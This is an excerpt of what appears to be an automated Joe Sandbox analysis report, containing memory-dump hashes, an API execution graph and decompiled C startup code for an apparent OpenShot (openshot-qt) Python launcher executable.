                                                                    • Instruction Fuzzy Hash: FAF082B28052046BD340DF15EC818A6F7ECDF98521B14C52EEC4C8B700E37AB9194EE2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.445883660.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_25a0000_unarchiver.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1efe974ca602ba48e556a404c0a1b9412cdd633ab05422785efcf3797615da37
                                                                    • Instruction ID: ae8903b013eb81a092fd6e616312c91b994fa99a0c92addfccd22ad2410b103d
                                                                    • Opcode Fuzzy Hash: 1efe974ca602ba48e556a404c0a1b9412cdd633ab05422785efcf3797615da37
                                                                    • Instruction Fuzzy Hash: 81E0DF32F082185FCB04DBB8885169E3FE6DB45164F118CBAD008EB352EB3988068380
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.445890655.0000000002600000.00000040.00000020.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2600000_unarchiver.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5e1a5fb203ac23ebe0b7a70c61f4872dbe8ab8e4f8cc6914b1e12db0cab2e96a
                                                                    • Instruction ID: 98ae2b891572eee9923349f07a594f5979c42d33680ccf84f76f8951ed88aa56
                                                                    • Opcode Fuzzy Hash: 5e1a5fb203ac23ebe0b7a70c61f4872dbe8ab8e4f8cc6914b1e12db0cab2e96a
                                                                    • Instruction Fuzzy Hash: D6E092766006004B9650DF0BEC81452F7D8EB88630718C47FDC0D8BB00D339B509CEE5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.445883660.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_25a0000_unarchiver.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b6f3f6ac7beb8091a87ae4fe333b2403cd292be8296d789bfc142b7c752bf28a
                                                                    • Instruction ID: a25705188ffc5a95785799942cbbc6c0b49e6ecdc72b4ff08d19861b5b899132
                                                                    • Opcode Fuzzy Hash: b6f3f6ac7beb8091a87ae4fe333b2403cd292be8296d789bfc142b7c752bf28a
                                                                    • Instruction Fuzzy Hash: A4D01232F042185B8B44EAB9584159F7BEA9B84554B11487D9008E7341EF3999018784
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.445883660.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_25a0000_unarchiver.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ebf8284b13e752e2146c018e38f4f5a2a08889473f892352b3fa211273bdef29
                                                                    • Instruction ID: 84e76f84f3a689f769445e6ebd621debb4519148f58d27baf9c56c1f8572b978
                                                                    • Opcode Fuzzy Hash: ebf8284b13e752e2146c018e38f4f5a2a08889473f892352b3fa211273bdef29
                                                                    • Instruction Fuzzy Hash: A4E0C22016E2804FCB078770D877A6A7F722B82208F4CC29AC0498BAE3C2288855CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.445883660.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_25a0000_unarchiver.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cbf92bbbb91402db478f799112a4e2039e5cceec586f3d54c72cf75447ff264f
                                                                    • Instruction ID: 04062c1fc1d9a97add8d916c655dd20cdb63e69847cd67f9aa11f524a03921ed
                                                                    • Opcode Fuzzy Hash: cbf92bbbb91402db478f799112a4e2039e5cceec586f3d54c72cf75447ff264f
                                                                    • Instruction Fuzzy Hash: 75C012302202048FCB08A774D52BB2B77E667C0308F88C56480090B391DB74E840C684
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:4.9%
                                                                    Dynamic/Decrypted Code Coverage:22.5%
                                                                    Signature Coverage:8.2%
                                                                    Total number of Nodes:280
                                                                    Total number of Limit Nodes:5
                                                                    execution_graph 14761 3011b3 14762 3011b8 14761->14762 14763 3011c0 Sleep 14762->14763 14773 3011ea 14762->14773 14765 3011cc 14763->14765 14764 301406 _amsg_exit 14766 301420 _initterm 14764->14766 14764->14773 14765->14762 14767 3011da 14765->14767 14766->14773 14767->14764 14767->14773 14768 301478 _initterm 14769 30149b 14768->14769 14772 3014a3 exit 14769->14772 14771 301241 SetUnhandledExceptionFilter 14771->14773 14773->14764 14773->14766 14773->14768 14774 301267 __p__wcmdln 14773->14774 14775 3012eb malloc 14773->14775 14776 3012e6 14773->14776 14787 302540 14773->14787 14774->14773 14775->14769 14778 301311 14775->14778 14776->14775 14777 301346 malloc memcpy 14777->14778 14779 30136f 14777->14779 14778->14777 14778->14778 14802 302170 14779->14802 14781 301388 14807 3021a0 14781->14807 14784 3013c2 14785 3013d0 14784->14785 14786 301462 _cexit 14784->14786 14789 302560 14787->14789 14801 302553 14787->14801 14788 302700 14791 302711 14788->14791 14788->14801 14789->14788 14790 30279f 14789->14790 14798 3026cd 14789->14798 14800 3025ed 14789->14800 14789->14801 14793 302380 11 API calls 14790->14793 14795 302741 14791->14795 14836 3023e0 14791->14836 14794 3027b9 14793->14794 14794->14771 14795->14798 14796 3023e0 11 API calls 14796->14800 14799 302772 VirtualProtect 14798->14799 14798->14801 14799->14798 14800->14789 14800->14796 14800->14798 14810 302380 14800->14810 14801->14771 14803 302110 14802->14803 14804 302179 14802->14804 14860 3014d0 _onexit 14803->14860 14804->14781 14806 302140 14806->14781 14861 301d80 GetModuleFileNameW 14807->14861 14809 3013af 14809->14772 14809->14784 14858 3087a0 14810->14858 14812 302394 fwrite 14859 3087a0 14812->14859 14814 3023c0 vfprintf abort 14820 3023e0 14814->14820 14815 302490 14815->14800 14816 302527 14817 302380 4 API calls 14816->14817 14825 302537 14817->14825 14818 30244b VirtualQuery 14819 302507 14818->14819 14818->14820 14821 302380 4 API calls 14819->14821 14820->14815 14820->14816 14820->14818 14822 3024a0 VirtualProtect 14820->14822 14821->14816 14822->14815 14823 3024e0 GetLastError 14822->14823 14824 302380 4 API calls 14823->14824 14824->14820 14826 30279f 14825->14826 14827 302700 14825->14827 14831 302380 4 API calls 14825->14831 14832 3023e0 VirtualQuery VirtualProtect GetLastError VirtualProtect 14825->14832 14834 3026cd 14825->14834 14835 302553 14825->14835 14829 302380 4 API calls 14826->14829 14828 3023e0 4 API calls 14827->14828 14827->14834 14827->14835 14828->14827 14830 3027b9 14829->14830 14830->14800 14831->14825 14832->14825 14833 302772 VirtualProtect 14833->14834 14834->14833 14834->14835 14835->14800 14842 3023f6 14836->14842 14837 302490 14837->14791 14838 302527 14839 302380 7 API calls 14838->14839 14853 302537 14839->14853 14840 30244b VirtualQuery 14841 302507 14840->14841 14840->14842 14843 302380 7 API calls 14841->14843 14842->14837 14842->14838 14842->14840 14844 3024a0 VirtualProtect 14842->14844 14843->14838 14844->14837 14845 3024e0 GetLastError 14844->14845 14846 302380 7 API calls 14845->14846 14846->14842 14847 30279f 14850 302380 7 API calls 14847->14850 14848 302700 14849 3023e0 7 API calls 14848->14849 14854 3026cd 14848->14854 14857 302553 14848->14857 14849->14848 14851 3027b9 14850->14851 14851->14791 14852 3023e0 7 API calls 14852->14853 14853->14847 14853->14848 14853->14852 14853->14854 14855 302380 7 API calls 14853->14855 14853->14857 14856 302772 VirtualProtect 14854->14856 14854->14857 14855->14853 14856->14854 14857->14791 14858->14812 14859->14814 14860->14806 14862 301f00 MessageBoxA Py_Finalize 14861->14862 14863 301dbd PathRemoveFileSpecW wcslen wcslen PyMem_Malloc 14861->14863 14866 301f32 Py_Finalize 14862->14866 14863->14862 14865 301e17 14863->14865 14886 3015d0 14865->14886 14866->14809 14869 301e97 PyImport_Import 14870 301f88 PyErr_ExceptionMatches 14869->14870 14871 301ea9 PyObject_GetAttrString 14869->14871 14872 301ff0 14870->14872 14873 301f9b 14870->14873 14871->14870 14874 301ec3 PyObject_CallObject 14871->14874 14931 3018d0 PyErr_Fetch PyErr_NormalizeException PyObject_GetAttrString 14872->14931 14889 301a90 PyErr_Fetch PyErr_NormalizeException PyTuple_New 14873->14889 14874->14870 14876 301edb 14874->14876 14878 301ee4 14876->14878 14879 301f68 _Py_Dealloc 14876->14879 14880 301f58 _Py_Dealloc 14878->14880 14881 301ee9 14878->14881 14879->14878 14880->14881 14882 301f48 _Py_Dealloc 14881->14882 14883 301eee 14881->14883 14882->14883 14884 301f78 _Py_Dealloc 14883->14884 14885 301ef9 14883->14885 14884->14866 14885->14866 14950 303060 14886->14950 14888 3015f7 Py_SetProgramName Py_SetPath Py_Initialize PySys_SetArgv PyUnicode_FromString 14888->14862 14888->14869 14890 301ca0 14889->14890 14894 301ad6 PySys_GetObject PySys_GetObject 14889->14894 14891 301600 21 API calls 14890->14891 14892 301cae 14891->14892 14897 301600 21 API calls 14892->14897 14895 301b24 14894->14895 14896 301b98 PyImport_ImportModule 14894->14896 14895->14896 14899 301b28 PyObject_CallObject 14895->14899 14896->14892 14898 301bac PyObject_GetAttrString 14896->14898 14900 301cc6 14897->14900 14901 301cd0 14898->14901 14902 301bc4 PyObject_CallObject 14898->14902 14903 301d30 14899->14903 14904 301b3c 14899->14904 14900->14885 14905 301600 21 API calls 14901->14905 14906 301ce8 14902->14906 14907 301bda PyUnicode_DecodeASCII 14902->14907 14903->14885 14985 301600 PyErr_Fetch PyErr_NormalizeException strlen PyUnicode_DecodeASCII 14904->14985 14910 301cde 14905->14910 14913 301600 21 API calls 14906->14913 14911 301d18 14907->14911 14912 301bfe PyUnicode_Join 14907->14912 14909 301b4a 14909->14885 14910->14885 14914 301600 21 API calls 14911->14914 14915 301d00 14912->14915 14916 301c14 PyObject_GetAttrString 14912->14916 14917 301cf6 14913->14917 14918 301d26 14914->14918 14921 301600 21 API calls 14915->14921 14919 301c35 PyErr_Clear PyUnicode_DecodeASCII 14916->14919 14920 301c2c 14916->14920 14917->14885 14918->14885 14923 301c5e 14919->14923 14924 301d5f 14919->14924 14920->14919 14920->14923 14922 301d0e 14921->14922 14922->14885 14926 301d50 PyUnicode_AsUnicode 14923->14926 14927 301c69 14923->14927 14925 301600 21 API calls 14924->14925 14930 301d6d 14925->14930 14926->14927 14928 301d40 PyUnicode_AsUnicode 14927->14928 14929 301c74 MessageBoxW 14927->14929 14928->14929 14929->14885 14930->14930 14932 3019b8 PyErr_Clear PyUnicode_DecodeASCII 14931->14932 14933 30191e 14931->14933 14934 30192d PyObject_GetAttrString 14932->14934 14935 3019e3 MessageBoxA Py_Finalize 14932->14935 14933->14932 14933->14934 14936 301a18 PyErr_Clear 14934->14936 14937 301949 14934->14937 14938 3019a5 14935->14938 14940 301959 14936->14940 14939 301a68 Py_Exit 14937->14939 14937->14940 14938->14885 14941 301a74 PyUnicode_AsUnicode 14939->14941 14942 301a61 PyLong_AsLong 14940->14942 14943 301969 PyObject_Str 14940->14943 14944 301a34 MessageBoxW 14941->14944 14947 301a59 Py_Exit 14942->14947 14945 301a26 14943->14945 14946 301978 MessageBoxA Py_Finalize 14943->14946 14944->14947 14948 301a2d 14945->14948 14949 301a7e PyUnicode_AsUnicode 14945->14949 14946->14938 14947->14942 14948->14941 14948->14944 14949->14948 14951 3030b0 14950->14951 14952 303079 14950->14952 14953 304ee0 7 API calls 14951->14953 14957 304ee0 _errno 14952->14957 14956 3030d0 14953->14956 14956->14888 14958 304f68 14957->14958 14966 303098 14957->14966 14959 304fd0 14958->14959 14961 304f99 14958->14961 14960 304ff6 14959->14960 14962 303560 6 API calls 14959->14962 14964 303560 6 API calls 14960->14964 14960->14966 14961->14966 14967 303560 14961->14967 14962->14960 14965 3057f3 14964->14965 14965->14965 14966->14888 14968 303574 14967->14968 14969 303690 14968->14969 14974 303593 14968->14974 14970 3036e3 fwprintf 14969->14970 14971 303696 14969->14971 14975 3035a2 14970->14975 14972 3036a7 fwprintf 14971->14972 14973 3036fd fwprintf 14971->14973 14972->14975 14973->14975 14976 303597 14974->14976 14981 3030e0 14974->14981 14975->14966 14976->14975 14978 303640 14976->14978 14980 3035ed fputwc 14976->14980 14978->14975 14979 303676 fputwc 14978->14979 14979->14978 14980->14976 14982 3030f1 14981->14982 14983 303100 14982->14983 14984 303118 fputwc 14982->14984 14983->14974 14984->14974 14986 3017b0 MessageBoxA Py_Finalize 14985->14986 14987 30165f PyUnicode_DecodeASCII 14985->14987 14986->14909 14988 3017f0 MessageBoxA Py_Finalize 14987->14988 14989 301687 PyTuple_New 14987->14989 14988->14909 14990 301890 MessageBoxA Py_Finalize 14989->14990 14991 30169b PyUnicode_Format 14989->14991 14990->14909 14993 301770 MessageBoxA Py_Finalize 14991->14993 14994 3016d7 PyUnicode_DecodeASCII 14991->14994 14993->14909 14995 301830 MessageBoxA Py_Finalize 14994->14995 14996 3016fb 14994->14996 14998 301868 PyUnicode_AsUnicode 14995->14998 14997 301878 PyUnicode_AsUnicode 14996->14997 14996->14998 14999 301711 MessageBoxW 14996->14999 14997->14990 14998->14997 14999->14909 15043 301124 __wgetmainargs 15000 6fd3a18 15001 6fd3a35 CreateWindowExW 15000->15001 15003 6fd3b3c 15001->15003 15003->15003 15044 6fd16c8 15046 6fd16f9 15044->15046 15047 6fd1744 15044->15047 15045 6fd1705 15046->15045 15050 6fd1930 15046->15050 15053 6fd1920 15046->15053 15057 6fd197a 15050->15057 15051 6fd193a 15051->15047 15054 6fd1930 15053->15054 15056 6fd197a 2 API calls 15054->15056 15055 6fd193a 15055->15047 15056->15055 15058 6fd1993 15057->15058 15059 6fd19ab 15058->15059 15065 6fd1c08 15058->15065 15069 6fd1bf8 15058->15069 15059->15051 15060 6fd1ba8 GetModuleHandleW 15062 6fd1bd5 15060->15062 15061 6fd19a3 15061->15059 15061->15060 15062->15051 15066 6fd1c1c 15065->15066 15067 6fd1c41 15066->15067 15073 6fd0970 15066->15073 15067->15061 15070 6fd1c08 15069->15070 15071 6fd0970 LoadLibraryExW 15070->15071 15072 6fd1c41 15070->15072 15071->15072 15072->15061 15074 6fd1dc8 LoadLibraryExW 15073->15074 15076 6fd1e41 15074->15076 15076->15067 15004 3ad01c 15005 3ad030 15004->15005 15006 3ad064 DrawFrame 15005->15006 15007 3ad081 15005->15007 15006->15007 15008 3ad0f0 15009 3ad108 15008->15009 15010 3ad162 15009->15010 15015 6fd3bbf 15009->15015 15019 6fd3bd0 15009->15019 15023 6fd0ad4 15009->15023 15027 6fd4f18 15009->15027 15016 6fd3bd0 15015->15016 15017 6fd0ad4 CallWindowProcW 15016->15017 15018 6fd3c17 15017->15018 15018->15010 15020 6fd3bf6 15019->15020 15021 6fd0ad4 CallWindowProcW 15020->15021 15022 6fd3c17 15021->15022 15022->15010 15024 6fd0adf 15023->15024 15026 6fd4f79 15024->15026 15031 6fd4a7c 15024->15031 15028 6fd4f28 15027->15028 15029 6fd4a7c CallWindowProcW 15028->15029 15030 6fd4f79 15028->15030 15029->15030 15032 6fd4a87 15031->15032 15033 6fd64da CallWindowProcW 15032->15033 15034 6fd6489 15032->15034 15033->15034 15034->15026 15035 6fd6410 15036 6fd6421 15035->15036 15037 6fd63db 15036->15037 15038 6fd652c 15036->15038 15039 6fd6482 15036->15039 15040 6fd0ad4 CallWindowProcW 15038->15040 15041 6fd64da CallWindowProcW 15039->15041 15042 6fd6489 15039->15042 15040->15042 15041->15042

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 30 30117c-30119a 31 3011a0-3011b1 30->31 32 301451-30145a GetStartupInfoW 30->32 33 3011cc-3011d8 31->33 34 301462-301477 _cexit 32->34 35 3011b8-3011ba 33->35 36 3011da-3011e4 33->36 37 3011c0-3011c9 Sleep 35->37 38 3013f3-301400 35->38 39 301406-30141a _amsg_exit 36->39 40 3011ea-3011f1 36->40 37->33 38->39 38->40 41 301420-301440 _initterm 39->41 42 30120f-301211 39->42 43 3011f7-301209 40->43 44 301478-301491 _initterm 40->44 45 301446-30144c 41->45 46 301217-30121e 41->46 42->45 42->46 43->41 43->42 47 30149b 44->47 45->46 48 301220-301239 46->48 49 30123c-30127c call 302540 SetUnhandledExceptionFilter call 3087c0 call 302370 __p__wcmdln 46->49 52 3014a3-3014af exit 47->52 48->49 58 301292-301299 49->58 59 30127e 49->59 61 301280-301283 58->61 62 30129b-3012a7 58->62 60 3012cd-3012d5 59->60 65 3012d7-3012e0 60->65 66 3012eb-30130b malloc 60->66 63 301285-301288 61->63 64 3012a9-3012b0 61->64 67 30128f 62->67 63->64 68 30128a 63->68 71 3012b2 64->71 72 3012c8 64->72 69 3012e6 65->69 70 3013ea 65->70 66->47 73 301311-30131d 66->73 67->58 68->67 69->66 70->38 74 3012b8-3012c6 71->74 72->60 75 301320-301326 73->75 74->72 74->74 76 3013e0-3013e5 75->76 77 30132c-301331 75->77 78 301346-30136d malloc memcpy 76->78 79 301338-301341 77->79 78->75 81 30136f-3013bc call 302170 call 3021a0 78->81 79->79 80 301343 79->80 80->78 81->52 86 3013c2-3013ca 81->86 86->34 87 3013d0-3013db 86->87
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000020.00000002.527664682.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                    • Associated: 00000020.00000002.527632088.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527726269.000000000030A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.000000000030E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527770351.0000000000310000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.527814222.0000000000313000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000020.00000002.528082356.0000000000358000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_32_2_300000_openshot-qt.jbxd
                                                                    Similarity
                                                                    • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__wcmdlnmemcpy
                                                                    • String ID: 0"0$x0
                                                                    • API String ID: 1204267290-177203793
                                                                    • Opcode ID: e872bc5137f06bdaafe04e273a508acdb496b77775b0a4f45d2acc9ffb7bda38
                                                                    • Instruction ID: f0bcec1e818a75ad84d49d3db0528ba5f822375f338019b576e2a91401255021
                                                                    • Opcode Fuzzy Hash: e872bc5137f06bdaafe04e273a508acdb496b77775b0a4f45d2acc9ffb7bda38
                                                                    • Instruction Fuzzy Hash: CA81A175A063008FDB27EFA9D9A476EB7F8FB44300F11892ED5858B691D7B19884CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 88 3011b3-3011b7 89 3011b8-3011ba 88->89 90 3011c0-3011d8 Sleep 89->90 91 3013f3-301400 89->91 90->89 97 3011da-3011e4 90->97 92 301406-30141a _amsg_exit 91->92 93 3011ea-3011f1 91->93 95 301420-301440 _initterm 92->95 96 30120f-301211 92->96 98 3011f7-301209 93->98 99 301478-301491 _initterm 93->99 100 301446-30144c 95->100 101 301217-30121e 95->101 96->100 96->101 97->92 97->93 98->95 98->96 102 30149b 99->102 100->101 103 301220-301239 101->103 104 30123c-30127c call 302540 SetUnhandledExceptionFilter call 3087c0 call 302370 __p__wcmdln 101->104 107 3014a3-3014af exit 102->107 103->104 113 301292-301299 104->113 114 30127e 104->114 116 301280-301283 113->116 117 30129b-3012a7 113->117 115 3012cd-3012d5 114->115 120 3012d7-3012e0 115->120 121 3012eb-30130b malloc 115->121 118 301285-301288 116->118 119 3012a9-3012b0 116->119 122 30128f 117->122 118->119 123 30128a 118->123 126 3012b2 119->126 127 3012c8 119->127 124 3012e6 120->124 125 3013ea 120->125 121->102 128 301311-30131d 121->128 122->113 123->122 124->121 125->91 129 3012b8-3012c6 126->129 127->115 130 301320-301326 128->130 129->127 129->129 131 3013e0-3013e5 130->131 132 30132c-301331 130->132 133 301346-30136d malloc memcpy 131->133 134 301338-301341 132->134 133->130 136 30136f-3013aa call 302170 call 3021a0 133->136 134->134 135 301343 134->135 135->133 140 3013af-3013bc 136->140 140->107 141 3013c2-3013ca 140->141 142 3013d0-3013db 141->142 143 301462-301477 _cexit 141->143
                                                                    C-Code - Quality: 21%
                                                                    			E003011B3(void* __eax, signed int __ebx, signed int __edi, signed int _a4, void* _a8) {
                                                                    				void* _v0;
                                                                    				void* _v16;
                                                                    				signed short _v44;
                                                                    				signed char _v48;
                                                                    				char _v104;
                                                                    				intOrPtr _v108;
                                                                    				void* _v112;
                                                                    				intOrPtr _v116;
                                                                    				int _t46;
                                                                    				intOrPtr* _t50;
                                                                    				_Unknown_base(*)()* _t52;
                                                                    				signed short** _t54;
                                                                    				signed short* _t55;
                                                                    				void* _t56;
                                                                    				intOrPtr* _t57;
                                                                    				signed int _t60;
                                                                    				void* _t61;
                                                                    				signed int _t62;
                                                                    				void* _t63;
                                                                    				void* _t64;
                                                                    				intOrPtr _t65;
                                                                    				void* _t67;
                                                                    				signed int _t69;
                                                                    				signed int _t71;
                                                                    				signed int _t74;
                                                                    				signed int _t76;
                                                                    				void* _t80;
                                                                    				void** _t83;
                                                                    				signed int _t86;
                                                                    				void* _t87;
                                                                    				intOrPtr _t88;
                                                                    				void _t91;
                                                                    				void* _t94;
                                                                    				signed int _t95;
                                                                    				signed int _t98;
                                                                    				signed int _t100;
                                                                    				void* _t105;
                                                                    				void* _t107;
                                                                    				void* _t110;
                                                                    				signed int _t111;
                                                                    				signed int _t114;
                                                                    				signed int _t115;
                                                                    				void** _t117;
                                                                    
                                                                    				_t100 = __edi;
                                                                    				_t74 = __ebx;
                                                                    				L4:
                                                                    				while(1) {
                                                                    					if(_t100 == _t46) {
                                                                    						_t76 = 1;
                                                                    						if( *0x30f0a8 != 1) {
                                                                    							goto L8;
                                                                    						} else {
                                                                    							goto L43;
                                                                    						}
                                                                    						goto L52;
                                                                    					} else {
                                                                    						Sleep(0x3e8);
                                                                    						_t117 = _t117 - 4;
                                                                    						L6:
                                                                    						_t46 = 0;
                                                                    						asm("lock cmpxchg [0x30f0a4], edi");
                                                                    						if(0 != 0) {
                                                                    							continue;
                                                                    						} else {
                                                                    							_t76 = 0;
                                                                    							if( *0x30f0a8 == 1) {
                                                                    								L43:
                                                                    								 *_t117 = 0x1f;
                                                                    								L003083C0();
                                                                    								if( *0x30f0a8 != 1) {
                                                                    									goto L11;
                                                                    								} else {
                                                                    									goto L44;
                                                                    								}
                                                                    								goto L52;
                                                                    							} else {
                                                                    								L8:
                                                                    								if( *0x30f0a8 == 0) {
                                                                    									_a4 = 0x311018;
                                                                    									_v0 = 0x31100c;
                                                                    									 *0x30f0a8 = 1;
                                                                    									L003083A8();
                                                                    								} else {
                                                                    									 *0x30e010 = 1;
                                                                    								}
                                                                    								if( *0x30f0a8 == 1) {
                                                                    									L44:
                                                                    									_a4 = 0x311008;
                                                                    									_v0 = 0x311000; // executed
                                                                    									L003083A8(); // executed
                                                                    									 *0x30f0a8 = 2;
                                                                    									if(_t76 != 0) {
                                                                    										goto L12;
                                                                    									} else {
                                                                    										goto L45;
                                                                    									}
                                                                    									L52:
                                                                    								} else {
                                                                    									L11:
                                                                    									if(_t76 == 0) {
                                                                    										L45:
                                                                    										_t37 = _t76;
                                                                    										_t76 =  *0x30f0a4;
                                                                    										 *0x30f0a4 = _t37;
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					L12:
                                                                    					_t50 = "0\"0"; // 0x302230
                                                                    					if(_t50 != 0) {
                                                                    						_a8 = 0;
                                                                    						_a4 = 2;
                                                                    						_v0 = 0;
                                                                    						_t50 =  *_t50();
                                                                    						_t117 = _t117 - 0xc;
                                                                    					}
                                                                    					E00302540(_t50, _t76, _t100, _t107);
                                                                    					_v0 = E00302830; // executed
                                                                    					_t52 = SetUnhandledExceptionFilter(??); // executed
                                                                    					_t114 = _t117 - 4;
                                                                    					 *0x30f0e0 = _t52;
                                                                    					 *_t114 = 0x301000;
                                                                    					_t54 = E00302370(E003087C0());
                                                                    					 *0x30e008 = 0x300000;
                                                                    					L003083E0();
                                                                    					_t86 = 0;
                                                                    					_t55 =  *_t54;
                                                                    					if(_t55 != 0) {
                                                                    						while(1) {
                                                                    							_t95 =  *_t55 & 0x0000ffff;
                                                                    							if(_t95 <= 0x20) {
                                                                    								goto L16;
                                                                    							}
                                                                    							L21:
                                                                    							_t86 =  ==  ? _t86 ^ 0x00000001 : _t86;
                                                                    							L19:
                                                                    							_t55 =  &(_t55[1]);
                                                                    							_t95 =  *_t55 & 0x0000ffff;
                                                                    							if(_t95 <= 0x20) {
                                                                    								goto L16;
                                                                    							}
                                                                    							L25:
                                                                    							 *0x30e004 = _t55;
                                                                    							goto L26;
                                                                    							L16:
                                                                    							if(_t95 != 0 && (_t86 & 0x00000001) != 0) {
                                                                    								_t86 = 1;
                                                                    								goto L19;
                                                                    							}
                                                                    							if(_t95 - 1 <= 0x1f) {
                                                                    								do {
                                                                    									_t100 = _t55[1] & 0x0000ffff;
                                                                    									_t55 =  &(_t55[1]);
                                                                    								} while (_t100 - 1 <= 0x1f);
                                                                    							}
                                                                    							goto L25;
                                                                    						}
                                                                    					} else {
                                                                    					}
                                                                    					L26:
                                                                    					if( *0x30f0c8 != 0) {
                                                                    						_t71 = 0xa;
                                                                    						if((_v48 & 0x00000001) != 0) {
                                                                    							_t71 = _v44 & 0x0000ffff;
                                                                    						}
                                                                    						 *0x309000 = _t71;
                                                                    					}
                                                                    					_t74 =  *0x30e024; // 0x1
                                                                    					_t105 = 4 + _t74 * 4;
                                                                    					 *_t114 = _t105;
                                                                    					_t56 = malloc(??);
                                                                    					_t87 =  *0x30e020; // 0xef0e78
                                                                    					_v112 = _t56;
                                                                    					if(_t74 <= 0) {
                                                                    						_t57 = _v112;
                                                                    					} else {
                                                                    						_t80 = _t56;
                                                                    						_t16 = _t105 - 4; // 0x74cb648c
                                                                    						_t65 = _t16;
                                                                    						_t110 = _t87;
                                                                    						_v116 = _t65;
                                                                    						_v108 = _t65 + _t87;
                                                                    						do {
                                                                    							_t91 =  *_t110;
                                                                    							if( *_t91 == 0) {
                                                                    								_t100 = 2;
                                                                    							} else {
                                                                    								_t69 = 1;
                                                                    								do {
                                                                    									_t69 = _t69 + 1;
                                                                    								} while ( *((short*)(_t91 + _t69 * 2 - 2)) != 0);
                                                                    								_t100 = _t69 + _t69;
                                                                    							}
                                                                    							 *_t114 = _t100;
                                                                    							_t110 = _t110 + 4;
                                                                    							_t80 = _t80 + 4;
                                                                    							_t67 = malloc(??);
                                                                    							 *(_t80 - 4) = _t67;
                                                                    							_t24 = _t110 - 4; // 0xadfb3c97
                                                                    							_a4 = _t100;
                                                                    							_v0 =  *_t24;
                                                                    							 *_t114 = _t67;
                                                                    							memcpy(??, ??, ??);
                                                                    						} while (_v108 != _t110);
                                                                    						_t57 = _v116 + _v112;
                                                                    					}
                                                                    					 *_t57 = 0;
                                                                    					 *0x30e020 = _v112;
                                                                    					E00302170();
                                                                    					_t60 =  *0x30e01c; // 0xef3078
                                                                    					 *__imp____winitenv = _t60;
                                                                    					_a4 = _t60;
                                                                    					_t61 =  *0x30e020; // 0xef0e78
                                                                    					_v0 = _t61;
                                                                    					_t62 =  *0x30e024; // 0x1
                                                                    					 *_t114 = _t62;
                                                                    					_t63 = E003021A0();
                                                                    					_t88 =  *0x30e014; // 0x0
                                                                    					 *0x30e018 = _t63;
                                                                    					if(_t88 == 0) {
                                                                    						 *_t114 = _t63;
                                                                    						exit(??);
                                                                    						 *0x30f0c8 = 1;
                                                                    						_t83 =  &_v0;
                                                                    						_t115 = _t114 & 0xfffffff0;
                                                                    						_push( *((intOrPtr*)(_t83 - 4)));
                                                                    						_push(_t111);
                                                                    						_t111 = _t115;
                                                                    						_push(_t100);
                                                                    						_push(_t105);
                                                                    						_t94 =  &_v104;
                                                                    						_push(_t74);
                                                                    						_push(_t83);
                                                                    						memset(_t94, 0, 0x11 << 2);
                                                                    						_t117 = _t115 - 0x78 + 0xc;
                                                                    						if( *0x30f0c8 != 0) {
                                                                    							 *_t117 = _t94;
                                                                    							GetStartupInfoW(??);
                                                                    							_t117 = _t117 - 4;
                                                                    						}
                                                                    						_t107 = Sleep;
                                                                    						_t100 =  *( *[fs:0x18] + 4);
                                                                    						goto L6;
                                                                    					}
                                                                    					_t98 =  *0x30e010; // 0x0
                                                                    					if(_t98 == 0) {
                                                                    						L003083B8();
                                                                    						_t64 =  *0x30e018; // 0x0
                                                                    						return _t64;
                                                                    					} else {
                                                                    						return _t63;
